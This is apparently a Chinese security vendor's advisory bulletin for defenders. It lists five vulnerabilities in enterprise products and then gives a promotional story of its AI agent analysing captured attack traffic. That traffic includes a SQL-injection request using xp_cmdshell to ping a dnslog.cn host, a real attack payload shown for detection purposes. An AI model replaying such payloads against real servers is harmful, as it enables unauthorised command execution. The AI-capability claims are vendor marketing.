漏洞导览 | |
· RAISECOM网关设备存在远程命令执行漏洞 | |
· 捷顺JieLink+智能终端操作平台存在SQL注入漏洞 | |
· 泛微E-Weaver存在SQL注入漏洞 | |
· 用友NC存在反序列化漏洞 | |
· 泛微E-Bridge云桥存在任意文件上传漏洞 |
漏洞概况
在当前网络攻防演练中,安恒信息CERT正紧密关注近期曝光的安全漏洞,持续进行监测和深入梳理。我们将对监测到的每一个漏洞进行深入分析和评估,为蓝队(防守方)输出漏洞清单。这份清单旨在帮助蓝队在攻防演练期间进行自检,并采取必要的措施来强化防护。
1、RAISECOM网关设备存在远程命令执行漏洞(安恒CERT编号:WM-202407-000035)
漏洞详情:
允许攻击者通过远程输入执行任意系统命令,操控目标服务器。
产品支持情况:
2、捷顺JieLink+智能终端操作平台存在SQL注入漏洞(安恒CERT编号:WM-202407-000036)
漏洞详情:
攻击者可以通过在输入字段中插入恶意的SQL代码来篡改原有的查询逻辑或获取敏感数据。
产品支持情况:
AiLPHA大数据平台、APT攻击预警平台、明鉴漏洞扫描系统、WAF、玄武盾已支持
3、泛微E-Weaver存在SQL注入漏洞(安恒CERT编号:WM-202407-00037)
漏洞详情:
攻击者通过在查询中插入延时函数,使攻击者能够探测和推断数据库结构和内容,进而泄露敏感信息。
产品支持情况:
AiLPHA大数据平台、APT攻击预警平台、明鉴漏洞扫描系统、WAF、玄武盾已支持
4、用友NC存在反序列化漏洞(安恒CERT编号:WM-202407-000046)
漏洞详情:
攻击者可以通过构造特定的序列化数据来触发恶意代码的执行,在服务器上执行任意代码。
产品支持情况:
AiLPHA大数据平台、APT攻击预警平台、明鉴漏洞扫描系统、WAF、玄武盾已支持
5、泛微E-Bridge云桥存在任意文件上传漏洞(WM-202407-000050)
漏洞详情:
允许攻击者将恶意文件上传至服务器,可能导致远程代码执行。
产品支持情况:
AiLPHA大数据平台、APT攻击预警平台、明鉴漏洞扫描系统、WAF、玄武盾已支持
恒脑x漏洞分析
从前有一位将军,在一场关键的战役中面对的敌军兵强马壮,装备精良,将军毫不退缩。他巧妙地利用己方弓箭和战马的优势,充分利用资源,最终取得了决定性的胜利。
同样在网络攻防演练场上,每天都有海量的攻击流量涌入,如何高效地应对并迅速处置成为各位“将军们”的当务之急。
事件回溯
窗外烈日炎炎,工位上的A师傅汗流浃背抱怨道:“这些攻击流量看不过来啊,有的响应报文还如此冗长,有没有什么好办法呢?”B师傅微笑着说道:“应对大挑战,为什么不试试恒脑的“超能力”呢。”随之,B师傅向A师傅介绍起了恒脑x态感平台,顺势将A师傅正在分析的可疑流量发送给了恒脑智能体,这些流量的细节如下:
请求报文
POST http://x.x.x.x:8000/xx/xx.aspx HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 188Origin:DNT: 1Connection: closeReferer: http://x.x.x.x:8000/xx/xx.aspxCookie: ASP.NET_SessionId=<value>; Lang=zh-cn; .ASPXAUTH=<value>Upgrade-Insecure-Requests: 1__VIEWSTATE=<value>&sql=exec+master..xp_cmdshell+%27ping+xxxx.dnslog.cn%27&mess=&run=
响应报文
HTTP/1.1 200 OKConnection: closeContent-Length: 2482Cache-Control: privateContent-Type: text/html; charset=utf-8Date: Tue, 23 Jul 2024 08:52:06 GMTServer: Microsoft-IIS/7.5X-Aspnet-Version: 2.0.50727X-Powered-By: ASP.NET<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" ><html><head><title>xx</title><script type="text/javascript">function closePage() {alert("<value>");window.location.href = "about:blank";window.close();}</script></head><body ms_positioning="FlowLayout"><form name="Form1" method="post" action="xx.aspx" id="Form1"><div><input type="hidden" name="" id="" value=" " /></div><div><input type="hidden" name="__VIEWSTATEGENERATOR" id=" " value=" " /></div><table cellpadding="0" cellspacing="0" width="100%" border="0"><tr><td><textarea name="sql" rows="25" cols="20" id="sql" style="width:100%;">exec master..xp_cmdshell 'ping xxxx.dnslog.cn'</textarea></td><td><textarea name="mess" rows="25" cols="20" id="mess" style="width:100%;">äº2024-07-23 16:52:06 32æ§è¡å¤±è´¥ï¼SQL Server é{返回内容}</textarea></td></tr></table></form></body></html>
经仔细观察可以发现该请求报文中包含xp_cmdshell、ping等命令,具备命令执行攻击的特征,需引起重视。但由于原报文的篇幅过长,即使是资深的安全专家也难以一眼下定论,不妨看看恒脑的表现如何呢?
不出所料,恒脑智能体展示了强大的”超能力“,快速解读冗长的响应报文,并从中迅速识别攻击者试图执行的攻击行为。恒脑智能体深入分析每条报文,输出其分析依据与研判结果。
恒脑x策略库随后对这个漏洞进行了快速检索,揭示其为一个未知的0day漏洞。师傅们立即加强警戒,将攻击流量同步至安恒研究院进一步分析,最终确认了这一发现并迅速制定了相应的产品漏洞解决方案。
另一边的A师傅随着恒脑智能体的逐行输出,感叹道:“这太厉害了!不仅能告知用户攻击者的行为和漏洞详情,还能为安全设备提供实用建议,新增相应的策略规则。”B师傅补充道:“恒脑不止于漏洞分析,它在态势感知、威胁情报分析以及实时攻防决策支持等多个安全领域中都起到关键作用,恒脑xEverything正是其设计理念与初衷的完美体现!”
在实际的攻防场景中,恒脑通过持续采集前端流量,并结合24小时不间断的自动分析和实时矫偏技术,能够及时发现并响应漏洞威胁,从而确保网络安全高效运转。无论是面对传统漏洞还是全新的未知威胁,恒脑展现出了卓越的应变能力和防御效果。
关于我们
如有漏洞相关需求支持请联系400-6059-110获取相关能力支撑。
往/期/回/顾
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...